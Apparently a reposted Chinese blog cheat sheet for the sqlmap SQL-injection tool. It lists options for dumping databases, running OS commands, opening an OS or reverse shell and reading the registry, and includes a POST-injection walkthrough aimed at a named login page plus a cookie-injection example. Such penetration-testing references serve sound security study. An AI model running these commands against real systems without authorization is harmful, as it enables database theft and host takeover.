zoukankan      html  css  js  c++  java
  • SQLMAP用法

    基本用法:

      --dbs  查询数据库

      --current--db  获取当前数据库名称

      --current--user 获得用户

      --tables -D “数据库”   // 列举数据库的表名

      --columns -T “表名” -D “数据库”   // 获取表的列名

      --dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的数据,包含列

      –privileges / 查看权限

      privileges -U root / 查看用户权限

      –roles / 枚举数据库用户角色

      --proxy "http://127.0.0.1:8080" 代理注入

      --sql-query=xx 要执行的SQL语句

      --sql-shell 提示交互式 SQL 的 shell

      --os-cmd=xxx执行操作系统命令
      --os-shell 交互式的操作系统的 shell
      --os-pwn 反弹shell
      --reg-read 读取win系统注册表
      --dbs-o "sqlmap.log" 保存进度
      --dbs-o "sqlmap.log" -resume 恢复已保存进度

    POST注入   

      1. 浏览器打开目标地址http:// blog.websafe3.org /Login.asp
      2. 配置burp代理(127.0.0.1:8080)以拦截请求
      3. 点击login表单的submit按钮
      4. 这时候Burp会拦截到了我们的登录POST请求
      5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下

      6. 运行sqlmap并使用如下命令:

      ./sqlmap.py -r search-test.txt -p tfUPass  

      这里参数-r 是让sqlmap加载我们的post请求rsearch-test.txt,
      而-p 大家应该比较熟悉,指定注入用的参数。

    COOKIES注入

      sqlmap.py -u "http://127.0.0.1/base.php" --cookies "id=1" --dbs --level 2

      默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用--level 参数且数值>=2的时候也会检查 cookie时面的参数,当>=3的时候将检查User-agent和Referer,那么这就很简单了,我们直接在原有的基础上面加上 --level 2 即可

  • 相关阅读:
    C语言学习趣事_BT_C_Code_混乱编程代码分析_1
    随想系列_6_终于被我发现Microsoft的一个错误了
    C语言学习趣事_经典面试题系列_2
    C++_系列自学课程_第_2_课_牛刀小试
    PLC_自动化控制系统_1_简说自动化控制系统
    随想系列_5_乱七八糟
    Android Handler使用
    Android Layout 布局属性
    MotionEvent事件在onInterceptTouchEvent()、onTouchEvent()中的传递顺序【转】
    AndroidMenifest 有关SdkVersion 说明
  • 原文地址:https://www.cnblogs.com/pangya/p/8915692.html
Copyright © 2011-2022 走看看